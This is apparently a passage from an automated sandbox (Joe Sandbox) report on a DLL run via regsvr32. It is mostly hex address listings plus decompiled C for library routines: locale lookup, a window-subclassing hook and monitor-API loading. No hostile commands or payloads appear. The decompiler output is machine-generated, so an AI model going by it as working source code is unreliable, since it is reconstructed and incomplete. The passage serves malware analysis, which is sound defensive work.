                                                                        0x10023c65
                                                                        0x10023c67
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023c71
                                                                        0x10023c74
                                                                        0x10023c75
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023c88
                                                                        0x10023c89
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023c91
                                                                        0x10023c97
                                                                        0x10023c98
                                                                        0x10023c9b
                                                                        0x10023c9b
                                                                        0x10023c9e
                                                                        0x10023c9e
                                                                        0x10023c9f
                                                                        0x10023ca3
                                                                        0x10023ca3
                                                                        0x10023ca4
                                                                        0x10023ca6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023cad
                                                                        0x10023caf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023cb6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023dca
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023cbe
                                                                        0x10023cc1
                                                                        0x10023cc1
                                                                        0x10023cc4
                                                                        0x10023cc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023cd1
                                                                        0x10023cd4
                                                                        0x10023cd7
                                                                        0x10023cd8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023ce2
                                                                        0x10023ce3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023b8d
                                                                        0x10023dcb
                                                                        0x10023dcb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023dc1
                                                                        0x10023dc3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023cf3
                                                                        0x10023cfa
                                                                        0x10023cfb
                                                                        0x10023cfd
                                                                        0x10023d00
                                                                        0x10023d00
                                                                        0x10023d00
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023d09
                                                                        0x10023d0c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023d17
                                                                        0x10023d1a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023d26
                                                                        0x10023d27
                                                                        0x10023d2a
                                                                        0x10023d2b
                                                                        0x10023d2e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023d35
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023d3a
                                                                        0x10023d3b
                                                                        0x10023d3b
                                                                        0x10023d11
                                                                        0x10023d11
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023d47
                                                                        0x10023d48
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023d4d
                                                                        0x10023d50
                                                                        0x10023d53
                                                                        0x10023d56
                                                                        0x10023d57
                                                                        0x10023d57
                                                                        0x10023d5b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023d62
                                                                        0x10023d66
                                                                        0x10023cc9
                                                                        0x10023cc9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023d73
                                                                        0x10023d76
                                                                        0x10023d78
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023d85
                                                                        0x10023d88
                                                                        0x10023d8b
                                                                        0x10023d8e
                                                                        0x10023d91
                                                                        0x10023d94
                                                                        0x10023da5
                                                                        0x10023da8
                                                                        0x10023dce
                                                                        0x10023dce
                                                                        0x10023dd0
                                                                        0x00000000
                                                                        0x10023dd0
                                                                        0x10023d9c
                                                                        0x10023d9d
                                                                        0x10023da0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023dd7
                                                                        0x10023dd8
                                                                        0x10023dd8
                                                                        0x10023dda
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023e06
                                                                        0x10023e07
                                                                        0x10023e0a
                                                                        0x10023e0c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023dad
                                                                        0x10023db0
                                                                        0x10023db3
                                                                        0x10023db6
                                                                        0x10023db7
                                                                        0x10023db7
                                                                        0x10023db8
                                                                        0x10023db8
                                                                        0x10023dba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023de1
                                                                        0x10023de4
                                                                        0x10023de5
                                                                        0x10023de5
                                                                        0x10023de8
                                                                        0x10023de8
                                                                        0x10023de9
                                                                        0x10023d03
                                                                        0x10023d03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023df2
                                                                        0x10023df5
                                                                        0x10023df8
                                                                        0x10023dfb
                                                                        0x10023dfc
                                                                        0x10023dfc
                                                                        0x10023dfd
                                                                        0x10023e00
                                                                        0x10023e00
                                                                        0x10023e02
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023e17
                                                                        0x10023e1d
                                                                        0x10023e1e
                                                                        0x10023e1f
                                                                        0x10023e22
                                                                        0x10023e22
                                                                        0x10023e25
                                                                        0x10023e26
                                                                        0x10023e2a
                                                                        0x10023e2b
                                                                        0x10023e2d
                                                                        0x10023e2f
                                                                        0x10023e32
                                                                        0x10023e32
                                                                        0x10023e34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023e3b
                                                                        0x10023e3d
                                                                        0x10023e3f
                                                                        0x10023e41
                                                                        0x10023e44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023b5e
                                                                        0x10023b5e
                                                                        0x10023b5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023b0b
                                                                        0x10023b54
                                                                        0x10023b54
                                                                        0x10023b59
                                                                        0x00000000
                                                                        0x10023b59
                                                                        0x10023a98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a9a
                                                                        0x10023a9f
                                                                        0x10023aa2
                                                                        0x10023aa9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023ab6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023ab8
                                                                        0x10023a17
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a1f
                                                                        0x10023a29
                                                                        0x10023a2f
                                                                        0x10023a39
                                                                        0x10023a3f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a47
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a49
                                                                        0x10023a57
                                                                        0x10023a5f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a5f
                                                                        0x10023a37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023a37
                                                                        0x10023a27
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100239f4
                                                                        0x100239ff
                                                                        0x10023a06
                                                                        0x10023e0e
                                                                        0x10023e0e
                                                                        0x10023e66
                                                                        0x10023e66
                                                                        0x10023e6b
                                                                        0x10023e70
                                                                        0x10023e70
                                                                        0x10023e74
                                                                        0x10023b60
                                                                        0x10023b66
                                                                        0x10023b6e
                                                                        0x10023b6e
                                                                        0x00000000
                                                                        0x10023a06
                                                                        0x100239f2
                                                                        0x100239b4
                                                                        0x100239ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100239c5
                                                                        0x100239c6
                                                                        0x100239c7
                                                                        0x100239cc
                                                                        0x00000000
                                                                        0x100239cc
                                                                        0x10023994
                                                                        0x10023999
                                                                        0x100239a4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID:
                                                                        • API String ID: 3519838083-0
                                                                        • Opcode ID: d40d6d6e6cef6803208f6e3609c2f1027a444feec77636e89629d5b53b439ef5
                                                                        • Instruction ID: 1e1e474db0047197a83ae3098e3256374823658fb0d5be61515164714213afbe
                                                                        • Opcode Fuzzy Hash: d40d6d6e6cef6803208f6e3609c2f1027a444feec77636e89629d5b53b439ef5
                                                                        • Instruction Fuzzy Hash: 52E19C74600209EFDF25CF58EC81AAE7BA9EF04750FA1C515F819EB292C735EA10DB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001A444 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1001A444(void* __ebx, int _a4) {
				intOrPtr _v8;
				char _v10;
				char _v16;
				void* __ebp;
				intOrPtr _t7;
				signed int _t9;
				signed int _t11;
				void* _t14;
				void* _t17;

				_t7 =  *0x1004c470; // 0x303bb91f
				_v8 = _t7;
				_v10 = 0;
				_t9 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
				if(_t9 != 0) {
					_t11 = E10012749(__ebx, _t14, _t17,  &_v16);
				} else {
					_t11 = _t9 | 0xffffffff;
				}
				return E100117AE(_t11, _v8);
			}












                                                                        0x1001a44a
                                                                        0x1001a451
                                                                        0x1001a460
                                                                        0x1001a464
                                                                        0x1001a46c
                                                                        0x1001a477
                                                                        0x1001a46e
                                                                        0x1001a46e
                                                                        0x1001a46e
                                                                        0x1001a486

                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 1001A464
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: 05a0c33dc4fe3510d994e67f2a9bcf377461d58a3556d082f56ba058f11004d6
                                                                        • Instruction ID: 3c73900817429885cf4f72f3856ece86c9a81f663f4ecb35863165dbab89a4dc
                                                                        • Opcode Fuzzy Hash: 05a0c33dc4fe3510d994e67f2a9bcf377461d58a3556d082f56ba058f11004d6
                                                                        • Instruction Fuzzy Hash: 66E09235A04248ABDB00DBF4D946E8D77F8AB45314F004155E550DB1D0DBB1E6848754
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10034959 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167registrylibraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E10034959(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				void* _v28;
				void* _v32;
				int _v36;
				int _v40;
				signed short _v44;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t46;
				void* _t47;
				signed int _t50;
				signed short _t65;
				signed int _t66;
				int _t70;
				signed short _t71;
				signed int _t72;
				signed short _t78;
				signed int _t79;
				char* _t85;
				int _t87;
				signed int _t95;
				signed int _t99;
				int _t100;
				int _t101;
				void* _t105;
				void* _t109;

				_t42 =  *0x1004c470; // 0x303bb91f
				_t85 = 0;
				_v8 = _t42;
				_v28 = 0;
				_t43 = GetModuleHandleA("kernel32.dll");
				_v36 = _t43;
				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
				if(_t44 == 0) {
					if(GetVersion() >= 0) {
						_t46 = GetModuleHandleA("ntdll.dll");
						if(_t46 == 0) {
							L13:
							 *((intOrPtr*)(_t109 + 0xffffffffffffffc4)) = 0x800;
							_t105 = 1;
							_t99 = 0;
							if(1 <= _t85) {
								L16:
								_t47 = 0;
								L17:
								return E100117AE(_t47, _v8);
							} else {
								goto L14;
							}
							while(1) {
								L14:
								_t47 = E100348C4(_t85, _t88, _t105, _a4,  *((intOrPtr*)(_t109 + _t99 * 4 - 0x3c)));
								_pop(_t88);
								if(_t47 != _t85) {
									goto L17;
								}
								_t99 =  &(1[_t99]);
								if(_t99 < _t105) {
									continue;
								}
								goto L16;
							}
							goto L17;
						}
						_t88 =  &_v28;
						_v28 = 0;
						EnumResourceLanguagesA(_t46, 0x10, 1, 0x10034943,  &_v28);
						if(_v28 == 0) {
							goto L13;
						}
						_t50 = _v28 & 0x0000ffff;
						_t88 = _t50 & 0x000003ff;
						_t100 = _t50 & 0x3ff;
						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t100);
						_v60 = ConvertDefaultLocale(_t100);
						_push(2);
						L12:
						_pop(0);
						goto L13;
					}
					_v32 = 0;
					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
						_v36 = 0x10;
						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011D9B(0, GetModuleHandleA, 0,  &_v24, "%x",  &_v44) == 1) {
							_t65 = _v44;
							_v28 = _t65;
							_t66 = _t65 & 0x0000ffff;
							_t88 = _t66 & 0x000003ff;
							_t101 = _t66 & 0x3ff;
							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t101);
							_t70 = ConvertDefaultLocale(_t101);
							_push(2);
							_v60 = _t70;
							_pop(0);
						}
						RegCloseKey(_v32);
					}
					goto L13;
				}
				_t71 =  *_t44();
				_v28 = _t71;
				_t72 = _t71 & 0x0000ffff;
				_t95 = _t72 & 0x3ff;
				_v32 = _t95;
				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t95);
				_v60 = ConvertDefaultLocale(_v32);
				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
				_v28 = _t78;
				_t79 = _t78 & 0x0000ffff;
				_t88 = _t79 & 0x000003ff;
				_t87 = _t79 & 0x3ff;
				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
				_v52 = ConvertDefaultLocale(_t87);
				_push(4);
				_t85 = 0;
				goto L12;
			}



































                                                                        0x1003495f
                                                                        0x1003496d
                                                                        0x10034974
                                                                        0x10034977
                                                                        0x1003497c
                                                                        0x10034984
                                                                        0x10034987
                                                                        0x1003498f
                                                                        0x10034a03
                                                                        0x10034ab0
                                                                        0x10034ab4
                                                                        0x10034afe
                                                                        0x10034afe
                                                                        0x10034b06
                                                                        0x10034b07
                                                                        0x10034b0b
                                                                        0x10034b24
                                                                        0x10034b24
                                                                        0x10034b26
                                                                        0x10034b32
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034b0d
                                                                        0x10034b0d
                                                                        0x10034b14
                                                                        0x10034b1c
                                                                        0x10034b1d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034b1f
                                                                        0x10034b22
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034b22
                                                                        0x00000000
                                                                        0x10034b0d
                                                                        0x10034ab6
                                                                        0x10034ac4
                                                                        0x10034ac7
                                                                        0x10034ad1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034ad3
                                                                        0x10034adf
                                                                        0x10034ae5
                                                                        0x10034af3
                                                                        0x10034af8
                                                                        0x10034afb
                                                                        0x10034afd
                                                                        0x10034afd
                                                                        0x00000000
                                                                        0x10034afd
                                                                        0x10034a1d
                                                                        0x10034a28
                                                                        0x10034a3f
                                                                        0x10034a4e
                                                                        0x10034a70
                                                                        0x10034a79
                                                                        0x10034a7c
                                                                        0x10034a81
                                                                        0x10034a87
                                                                        0x10034a95
                                                                        0x10034a98
                                                                        0x10034a9a
                                                                        0x10034a9c
                                                                        0x10034a9f
                                                                        0x10034a9f
                                                                        0x10034aa3
                                                                        0x10034aa3
                                                                        0x00000000
                                                                        0x10034a28
                                                                        0x10034991
                                                                        0x100349a3
                                                                        0x100349a6
                                                                        0x100349ad
                                                                        0x100349b5
                                                                        0x100349bd
                                                                        0x100349ca
                                                                        0x100349d3
                                                                        0x100349d5
                                                                        0x100349d8
                                                                        0x100349dd
                                                                        0x100349df
                                                                        0x100349ea
                                                                        0x100349ef
                                                                        0x100349f2
                                                                        0x100349f4
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                        • GetVersion.KERNEL32 ref: 100349FB
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10034A20
                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10034A46
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10034A92
                                                                        • ConvertDefaultLocale.KERNEL32(76D84DE0), ref: 10034A98
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10034AA3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                        • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                        • API String ID: 780041395-483790700
                                                                        • Opcode ID: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                        • Instruction ID: 7cfe531e2014ce0a7197dcc2f573d90a24e44201c953dd79459b2257b218328e
                                                                        • Opcode Fuzzy Hash: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                        • Instruction Fuzzy Hash: 00515F75D0022DAFDB12DFE6DC85AEFBBF8EB48355F11442AE501EB140DB7899409BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100235CF Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E100235CF(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				char _v272;
				struct _WNDCLASSEXA _v320;
				void* __ebp;
				intOrPtr _t52;
				signed int _t56;
				char _t58;
				long _t60;
				int _t71;
				long _t81;
				CHAR* _t83;
				void* _t90;
				void* _t99;
				long* _t102;
				signed int _t104;
				long _t105;
				CHAR* _t107;
				int _t108;

				_t52 =  *0x1004c470; // 0x303bb91f
				_push(0x100347fd);
				_v8 = _t52;
				_t90 = E10037855(0x1004efe8);
				if(_a4 == 3) {
					_t104 =  *(_t90 + 0x14);
					_push(__edi);
					_t99 =  *_a12;
					_t56 =  *(E100373B5() + 0x14) & 0x000000ff;
					_a4 = _t56;
					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
						if( *0x1004f354 == 0) {
							L10:
							if(_t104 == 0) {
								if( *0x1004ef68 != 0) {
									L16:
									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x1004ef68) {
										L20:
										_t58 = GetWindowLongA(_a8, 0xfffffffc);
										_v16 = _t58;
										if(_t58 != 0) {
											_t107 = "AfxOldWndProc423";
											if(GetPropA(_a8, _t107) == 0) {
												SetPropA(_a8, _t107, _v16);
												if(GetPropA(_a8, _t107) == _v16) {
													GlobalAddAtomA(_t107);
													SetWindowLongA(_a8, 0xfffffffc, 0x10023477);
												}
											}
										}
										goto L24;
									}
									goto L24;
								}
								_t108 = 0x30;
								E10011C50( &_v320, 0, _t108);
								_v320.cbSize = _t108;
								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
								 *0x1004ef68 = _t71;
								if(_t71 == 0) {
									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
										goto L20;
									}
									_v17 = 0;
									if(E10011CB0(_t90, _t99,  &_v272, "#32768") == 0) {
										goto L24;
									}
									goto L20;
								}
								goto L16;
							}
							E1002212F(_t104, _a8);
							 *((intOrPtr*)( *_t104 + 0x50))();
							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002292C);
							if(_t81 != E1002292C) {
								 *_t102 = _t81;
							}
							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
							goto L24;
						}
						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
							goto L24;
						}
						_t83 =  *(_t99 + 0x28);
						if(_t83 <= 0xffff) {
							_v16 = 0;
							GlobalGetAtomNameA(0,  &_v16, 5);
							_t83 =  &_v16;
						}
						if(lstrcmpiA(_t83, "ime") == 0) {
							goto L24;
						}
						goto L10;
					} else {
						L24:
						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
						if(_a4 != 0) {
							UnhookWindowsHookEx( *(_t90 + 0x28));
							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
						}
						_t60 = _t105;
						goto L27;
					}
				} else {
					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
					L27:
					return E100117AE(_t60, _v8);
				}
			}























                                                                        0x100235d8
                                                                        0x100235de
                                                                        0x100235e8
                                                                        0x100235f4
                                                                        0x100235f6
                                                                        0x10023613
                                                                        0x10023616
                                                                        0x10023617
                                                                        0x10023620
                                                                        0x10023624
                                                                        0x10023627
                                                                        0x10023642
                                                                        0x10023692
                                                                        0x10023694
                                                                        0x100236db
                                                                        0x10023718
                                                                        0x1002372a
                                                                        0x10023761
                                                                        0x10023766
                                                                        0x1002376e
                                                                        0x10023771
                                                                        0x10023779
                                                                        0x10023786
                                                                        0x1002378f
                                                                        0x1002379e
                                                                        0x100237a1
                                                                        0x100237b1
                                                                        0x100237b1
                                                                        0x1002379e
                                                                        0x10023786
                                                                        0x00000000
                                                                        0x10023771
                                                                        0x00000000
                                                                        0x1002372c
                                                                        0x100236df
                                                                        0x100236ea
                                                                        0x100236f8
                                                                        0x10023707
                                                                        0x10023710
                                                                        0x10023716
                                                                        0x10023748
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023752
                                                                        0x1002375f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002375f
                                                                        0x00000000
                                                                        0x10023716
                                                                        0x1002369b
                                                                        0x100236a4
                                                                        0x100236bc
                                                                        0x100236be
                                                                        0x100236c6
                                                                        0x100236c8
                                                                        0x100236c8
                                                                        0x100236ca
                                                                        0x00000000
                                                                        0x100236ca
                                                                        0x10023654
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002365a
                                                                        0x10023662
                                                                        0x10023670
                                                                        0x10023675
                                                                        0x1002367b
                                                                        0x1002367b
                                                                        0x1002368c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100237b7
                                                                        0x100237b7
                                                                        0x100237cc
                                                                        0x100237ce
                                                                        0x100237d3
                                                                        0x100237d9
                                                                        0x100237d9
                                                                        0x100237de
                                                                        0x00000000
                                                                        0x100237e0
                                                                        0x100235f8
                                                                        0x10023604
                                                                        0x100237e1
                                                                        0x100237eb
                                                                        0x100237eb

                                                                        APIs
                                                                          • Part of subcall function 10037855: __EH_prolog.LIBCMT ref: 1003785A
                                                                        • CallNextHookEx.USER32 ref: 10023604
                                                                        • GetClassLongA.USER32 ref: 10023649
                                                                        • GlobalGetAtomNameA.KERNEL32 ref: 10023675
                                                                        • lstrcmpiA.KERNEL32(?,ime,?,?,100347FD), ref: 10023684
                                                                        • SetWindowLongA.USER32(?,000000FC,Function_0002292C), ref: 100236BE
                                                                        • CallNextHookEx.USER32 ref: 100237C2
                                                                        • UnhookWindowsHookEx.USER32(?), ref: 100237D3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                        • String ID: #32768$AfxOldWndProc423$ime
                                                                        • API String ID: 3204395069-4034971020
                                                                        • Opcode ID: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                        • Instruction ID: 9db2fd6ca1a0fe5cf1724ce820e3dc2bd2b139ec8c0118dd51308d1b35c9be8a
                                                                        • Opcode Fuzzy Hash: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                        • Instruction Fuzzy Hash: 1051AB75504269BFDF12DF61EC88FAA7BB9EF053A0F618164F814EA1A1C730DA44CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000799F Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E1000799F() {
				void* __edi;
				intOrPtr _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				void* _t17;
				struct HINSTANCE__* _t18;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1004ee14; // 0x0
				if(_t23 == 0) {
					_push(_t17);
					 *0x1004ee18 = E10007952(_t17);
					_t18 = GetModuleHandleA("USER32");
					if(_t18 == 0) {
						L11:
						 *0x1004edf8 = 0;
						 *0x1004edfc = 0;
						 *0x1004ee00 = 0;
						 *0x1004ee04 = 0;
						 *0x1004ee08 = 0;
						 *0x1004ee0c = 0;
						 *0x1004ee10 = 0;
						 *0x1004ee14 = 1;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						 *0x1004edf8 = _t6;
						if(_t6 == 0) {
							goto L11;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							 *0x1004edfc = _t7;
							if(_t7 == 0) {
								goto L11;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								 *0x1004ee00 = _t8;
								if(_t8 == 0) {
									goto L11;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									 *0x1004ee04 = _t9;
									if(_t9 == 0) {
										goto L11;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										 *0x1004ee0c = _t10;
										if(_t10 == 0) {
											goto L11;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											 *0x1004ee08 = _t11;
											if(_t11 == 0) {
												goto L11;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												 *0x1004ee10 = _t12;
												if(_t12 == 0) {
													goto L11;
												} else {
													_t5 = 1;
													 *0x1004ee14 = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t5;
				} else {
					_t24 =  *0x1004ee08; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}
















                                                                        0x100079a2
                                                                        0x100079a8
                                                                        0x100079b8
